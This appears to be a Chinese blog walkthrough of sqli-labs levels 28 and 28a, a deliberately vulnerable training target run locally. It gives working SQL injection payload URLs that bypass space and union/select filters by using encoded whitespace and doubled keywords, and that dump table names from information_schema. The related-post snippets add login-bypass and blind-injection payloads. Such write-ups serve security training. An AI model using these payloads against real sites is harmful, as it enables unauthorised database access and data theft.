sqli-labs(28-28a)

最新推荐文章于 2024-05-18 14:28:08 发布
最新推荐文章于 2024-05-18 14:28:08 发布
阅读量1.4k 收藏 2
点赞数 1
分类专栏: sqli-labs 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43579362/article/details/104324346
版权

Less-28

1.测试http://127.0.0.1/sqli-labs/Less-28/?id=1%27,页面回显不正常,但又没有错误提示,报错注入没戏,尝试闭合语句,加单引号回显不正常,说明sql语句闭合至少有',可能有),判断有无)在Less-26已经写过,经过验证确实含有'
2.尝试使用联合查询注入,构造语句http://127.0.0.1/sqli-labs/Less-28/?id=1%27);union%20select%00,看回显
在这里插入图片描述空格没有了,说明空格被过滤了,尝试使用特殊字符绕过过滤,经测试如下特殊字符可以替换空格%0a,%0d,%20,%0b,/%0a/,再来构造http://127.0.0.1/sqli-labs/Less-28/?id=1%27);union%0dselect%0d1,2,3;%00,看回显
在这里插入图片描述,由前后两次构造的语句和回显提示,说明过滤了union+空格(包括可替代空格的特殊字符)+select,但是又没过滤单独存在的union,select,尝试构造http://127.0.0.1/sqli-labs/Less-28/?id=0')union%0dunion%0dselectselect%0d1,2,3看是否能回显正常,测试后,结果,联合查询注入存在,查询方法前面已有,搞定。
在这里插入图片描述
3.再来看看有没有布尔型注入,构造http://127.0.0.1/sqli-labs/Less-28/?id=1%27)and%271%27=%272%27;%00,http://127.0.0.1/sqli-labs/Less-28/?id=1%27)and%271%27=%271%27;%00后一个回显正常,说明存在布尔型注入,脚本在Less-26已经有了,稍微改一下就好了。

Less-28a

在这里插入图片描述
过滤很严格,但是还是存在绕过滴,比如http://127.0.0.1/sqli-labs/Less-28a/?id=0%27)union%0Aseunion%0Aselselectectlect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema=%27security%27;%00,存在联合查询注入,搞定
在这里插入图片描述
同样也可以使用脚本进行注入。

··KElis
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQL-Labs靶场“26-28”关通关教程
钟言的博客
02-26 9720
本关SQL-Labs靶场的26-28关通关教程,详细内容包含了、二十六关 基于GET过滤空格以及注释报错注入 1、源码分析 2、绕过思路 3、updatexml报错注入 二、二十六a关 基于GET过滤空格注释字符型注入 1、源码分析 2、绕过思路 3、时间盲注 三、二十七关 基于union及select的过滤单引号注入 1、源码分析 2、绕过思路 3、联合查询注入 4、updatexml报错注入 四、二十七a关 基于union及select的过滤双引号注入 1、源码分析 2、绕过思路 3、联合查询注入等等
sqli-labs进阶篇 25_28
Lucky小小吴的小屋
01-30 912
一、如何判断单/双引号注入? ?id=1' 报错了,一定是单引号注入 -- 解析下 ①如果是双引号注入:"XXX" 输入:?id=1" or 1=1 执行:"1" or 1=1 " 结果:报错 ②如果是单引号注入:'XXX' 输入:?id=1" or 1=1 执行:'?id=1" or 1=1' 结果:id=1,执行成功 二、如何判断闭合注入? 以单引号为例 三、怎么绕过一些字符? 一般是使用3种方法进行绕过,分别是URL编码、大小写、重写 (1)URL编码的常见字符 %09
sqli-labs SQL注入靶场通关手册(1-20)
最新发布
2401_83601024的博客
05-18 1902
因为我们使用单引号闭合了 passwd 参数所在的 Sql 语句的前面的部分,使用 OR 连接的 updatexml() 函数就会被执行。获取数据库名,使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。获取数据库名,使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用 “#” 注释掉后面的内容注入。
SQL-labs的第28关——union和select被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-04 321
该关的空格、-和注释也别屏蔽了。这里是屏蔽union select这个组合而不是单个的union或select。并且该关不返回错误,所以不使用?id=1\,而且也不使用报错注入。
sqli-labs(28)---原创原创自此一家
weixin_30437847的博客
05-29 671
0X01构造闭合 ’报错 )报错 其他不报错 那我们猜想是不是')的闭合 ?id=1')||('1')=('1 返回正确 那么好像猜对了 0X02爆表名 过滤了相连接的union和select ?id=')%0AUNIOn%0ASELECt%0A1,database(),3and%0A('1')=('1 这里过滤了相连接的union select 那咋办呐? ...
Sqlilabs-28
KAKA的博客
07-14 429
因为是 Winodws 那就盲注吧,这跟 26a27a 关卡一样, payload 改改就可以用了,这一关同样把报错信息给过滤了,所以报错注入用不了: –查表 http://sqlilabs/Less-28/?id=1')and(if(ascii(substr((SeLect(table_name)from(SeLect(table_name),(table_rows)from(information_schema.tables)where(table_schema=database())and(tabl
sqli-labs通关28-31
m0_62207170的博客
02-27 114
sqli-labs通关28-31
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
基于Sqli-Labs靶场的SQL注入-25~28
Joker
01-07 1433
这一篇博客我主要讲了各种语句被注释后的绕过方法,包括 and 和 or 的绕过、空格和注释符的绕过、union 和 select 的绕过。
(手工)【sqli-labs2828a】字符型注入、盲注、过滤
07-14 1066
SQL-字符型注入、盲注、过滤】
sqli-labs/Less-28
m0_71299382的博客
11-20 337
sqli-labs第二十八a关
sql-labs】闯关记录28~38详解
qq_43665434的博客
04-24 575
sql-labs】闯关记录28~38 【less-28】过滤union%0aselect 测试流程 ?id=1') and%0a'1'=('1 #成功回显 ?id=1') and%0a'1'=('2 #会显失败 #测试回显字段 ?id=232323') %0aunion%0aselect%0a1,2,3%0aand%0a'1'=('1 #发现union%0aselect被过滤了 #于是混淆双写,成功绕过 ?id=232323') %0auniunion%0aselecton%0aselect
sql-labs闯关26~31
qq_44663230的博客
09-03 2324
sql-labs闯关26-28a 29~31暂时不做
sqli-labs————Less-28
Fly_鹏程万里
05-16 1072
Less 28这一关于之前的27关没有什么差别,这里直接给出一个payload,用户可以自己思考自我测试,如果有不清楚的可以查看之前的第27关的详细介绍。payload:http://192.168.11.136/sqli-labs/Less-28?id=1')union%a0select(1),(user()),(3)||('1...
SQLi Labs Lesson28 & Lesson28a
1ame的博客
08-23 335
Lesson - 28a GET - Error Based - All your UNION & SELECT Belong to US - String - Single Quotes with parenthesis 欢迎界面: 构造 ?id=1,结果如图所示: 构造 ?id=1',结果没有任何信息,应该是关闭了错误错误回显。 构造 ?id=1" z
sqli-labs通关28
03-05
sqli-labs是一个用于学习和练习SQL入的实验平台。通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在URL中可以看到登录请求的参数,例如:`http://localhost/sqli-labs/Less-28/?id=1&Submit=Submit#`。 4. 在URL中的`id`参数处存在SQL注入漏洞,我们可以尝试利用这个漏洞进行攻击。 5. 输入`' or '1'='1`作为`id`参数的值,然后点击提交按钮。 6. 如果成功利用了SQL注入漏洞,你将会被认为是管理员身份登录成功,并且可以看到管理员的相关信息。 请注意,sqli-labs是一个用于学习和练习SQL注入的平台,仅供合法目的使用。在实际应用中,SQL注入是一种严重的安全漏洞,需要谨慎对待。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值